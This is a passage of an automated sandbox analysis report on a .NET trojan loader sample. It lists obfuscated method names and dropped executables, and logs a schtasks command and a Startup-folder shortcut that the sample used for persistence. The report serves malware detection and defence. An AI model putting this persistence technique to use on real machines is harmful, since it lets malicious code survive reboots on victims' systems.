                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack, NkEtj4xdihRGcDPjVY.csHigh entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, JI4vkvhZNFR6VPxsSYH.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eIlLMT42tu', 'cpeLxkCWHZ', 'tv4LK99ryr', 'uxoLRD4PcS', 'YjELoReim3', 'ucuLXtbw1h', 'FD9L0pYyGp'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, Mp9dr9heXowoDfUBc7f.csHigh entropy of concatenated method names: 'juQPub4LRd', 'VkcP2hsoBx', 'H4BPEOPojm', 'KxBPldmP3G', 'tkUPbkhfJU', 'xh4Pj2yG79', 'zOBPFNtjG6', 'nlfPHxW0gw', 'jYvPT7D66L', 'vQxPNg5Va1'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, b8OPa0ptDmNZRs8a1D.csHigh entropy of concatenated method names: 'yMBQuZx1tN', 'c0nQ2gq3Ti', 'bpyQEhSPSi', 'LIIQlRLJWf', 'YIQQbb7ly2', 'V5AQjkTChY', 'FkRQFfSYrk', 'tlHQHCv4v6', 'DJqQTqJOwS', 'nFAQNGM3b3'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, coAw41HW9K74cRgqAt.csHigh entropy of concatenated method names: 'xCadMtcqxQ', 's8qdxD7g1u', 'RaAdKMstbX', 'pIsdR6b2NG', 'orFdo8AuaI', 'cYddX5M88T', 'i8Jd0MwTgE', 'Hsod66jcdN', 'YwbdasWrn9', 'F46dv83Xbf'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, jfuRhmRFSFcbJIi4WP.csHigh entropy of concatenated method names: 'VhT9ieQqr3', 'CqM9DZKmvA', 'ToString', 'COQ9rguSSI', 'mUS9dINkow', 'ggE9y7PtBy', 'Kj99nUbt4a', 's5e9wyNOE6', 's3B9QH2QYT', 'f8Y9WLFfUy'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, SjnStH1RyS9c3mH92a.csHigh entropy of concatenated method names: 'yLFMOA8WAAlNiD9amjl', 'Hy14R789odQie6v2opT', 'Uhdw5SXmBk', 'oWnwPMcY5A', 'gmUwLLnBPO', 'NZ5G3E8Y9D6ZK17Nng2', 'CUdHLE8Cn9xMvRwuE1M'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, mh2l126nvXkJPqinWr.csHigh entropy of concatenated method names: 'x7a5rKFIRk', 'C3A5dPgPdM', 'GkX5yF7S3j', 'yEt5nm6DkN', 'WaE5w7F9Cw', 'Yfk5QB6gFl', 'quZ5Wu7I0v', 'DmO5Jb19Ah', 'beL5iK8Wsp', 'jf05DxnnIp'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, pvhWxLsdO1DVJwN9jq.csHigh entropy of concatenated method names: 'XWmEmQX6M', 'v4YlVYaPb', 'BeXjDed6V', 'sEOF8dalU', 'b6wTRh61a', 'w3cNyomnx', 'mrhFRP01KAgA2yUNhb', 'HRewZLKZvRAueRXW5q', 'mRr591eEl', 'jZxLJy2Bf'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, WjkYcFaADDIrVYCSaV.csHigh entropy of concatenated method names: 'RPn5moSJ3U', 'cjU51dDQC8', 'OOX5ty6d4N', 'bDq5GqWTMH', 'Rle5MDxjJo', 'va358bWPO1', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, SWahZnhhsOyUNFiqsqU.csHigh entropy of concatenated method names: 'ToString', 'x8ALZjZ2pQ', 'IsgLYLe3sw', 'Qg2LC7koos', 'oWpLrUHxhm', 'MkqLdDfbBN', 'k5GLyNT9Ai', 'vlBLn5CdTh', 'STXP7Dt0PuWZR7YIp1H', 'GJDo6utKWpfA1JDfWbP'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, GhCMeWYfcmcjoFgkhc.csHigh entropy of concatenated method names: 'hbshQoAw41', 'k9KhW74cRg', 'G74hiIHXde', 'ODAhDyuWaw', 'uKjhSBE6an', 'Wn1hfuaoM5', 'uBDnG9iGbOJqaJM3dT', 'G6YU2ywaqS39KNaKJZ', 'hu40pVTRMNbwmGEEf4', 'YePhhkRXxK'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, zYGaDtX4dK2rk9sZDn.csHigh entropy of concatenated method names: 'cVl96CpqDM', 'bWo9vytyGg', 'QD35ejUB7J', 'CVl5hQfZrC', 'yGT9VNfLRc', 'zAW9cSuDQH', 'QML9BHZ7kp', 'ooA9McAuTc', 'uLs9xFebNw', 'LXm9KOXoI9'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, z6ivISdWp2AJ9wgyAj.csHigh entropy of concatenated method names: 'Dispose', 'arqhaQkL3o', 'Jr0s1IJBay', 'uYUAAj2Dbe', 'Gihhv2l12n', 'YXkhzJPqin', 'ProcessDialogKey', 'kr0sejkYcF', 'tDDshIrVYC', 'oaVssQdI4X'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, MYCV8nMEqlsK44xms5.csHigh entropy of concatenated method names: 'eVlSUlk4do', 'HqyScZAhNf', 'S9uSMMsRtf', 'dvXSxWu7vt', 'Aq8S10o4Zk', 'SWoSt20gRl', 'jSwSGHftHd', 'dukS8NkTfq', 'gflSgcPbC0', 'sP9SI4UbeT'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, HE2n9dW4U1DsdVPZZK.csHigh entropy of concatenated method names: 'OoOZCA8E9j', 'xhaZrrQ4fu', 'k32Zdj6yvJ', 'xlKZy9uJrA', 'f0GZnSLUlP', 'nCGZwfZ8iA', 'se9ZQJJvOG', 'F61ZWXyA0j', 'UAAZJUUHlB', 'ChKZieQo9Y'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, Vj0JHiB7G6ybQSlcTY.csHigh entropy of concatenated method names: 'ht2OHLqdaP', 'x9uOTA57No', 'huXOmZRwJL', 'j2xO1FIvAy', 'tejOGie39E', 'YowO8nEWtA', 'gqXOI8h56a', 'CmMO3uujtJ', 'Y9OOU5yEPv', 'L1wOV2DZrb'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, XvAgkWK92GpW3mdirl.csHigh entropy of concatenated method names: 'ToString', 'L2GfV8xYEt', 'KcYf1oUkZK', 'X6eftY7HC7', 'HYhfGO9m3M', 'WiUf8MQPSa', 'JB3fgqRyA2', 'b12fIPpV6D', 'lOmf3SpnKO', 'cqKfpfMtPS'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, AMFGj7IDacdLWcWuGv.csHigh entropy of concatenated method names: 'AfyQreieJn', 'sg5Qymp1pQ', 'dcKQwwN7V6', 'MAuwvtXBDG', 'ELvwzEFaUo', 'kquQecfcjR', 'ciBQhSYyNW', 'RptQsouRyf', 'riWQZD1HKG', 'hMCQYmA1Vi'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, jdI4XivoDg48OHO0PZ.csHigh entropy of concatenated method names: 'f1SPhRb8JP', 'gZaPZXfpN1', 'b3xPYqcDFa', 'oZRPrOxViG', 'YAkPdMUSUX', 'LD4PnrmQkc', 'c4HPwiKmGk', 'mTf5093kOp', 'rar56AdJgh', 'tp75ayts8y'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, yWawNINotSqR24KjBE.csHigh entropy of concatenated method names: 'zvEnbaejE8', 'Rf3nF4iNWZ', 'wnBytcd78B', 'qqhyGkplpF', 'Gg9y8MhoFl', 'bQjygKiEoD', 'LlQyIh5y4N', 'Yely3A851l', 'Ap9ypwAHpD', 'twJyUPC2fm'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, Xan0n1muaoM5hJxIYH.csHigh entropy of concatenated method names: 'HxMwCNsxxK', 'jbTwdjFFJU', 'fViwnIdgcp', 'FrhwQuIH3L', 'EHjwWNGLQJ', 'iDjno2Ustq', 'mRfnXsSN9M', 'yvun0UhHAg', 'kYPn6F58iq', 'cwBnaEcbwW'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, tsbxymT74IHXdeVDAy.csHigh entropy of concatenated method names: 'mjKylxf4J3', 'SPEyjUlYVm', 'i3ryHMiXKI', 'zGPyTWp6AR', 'vnmyS3M9WS', 'edsyf6F3Wo', 'VGIy98Cmuk', 'UT0y5TxGPV', 'rlqyPLRAR0', 'AkryLc3gFN'
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeFile created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeJump to dropped file
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
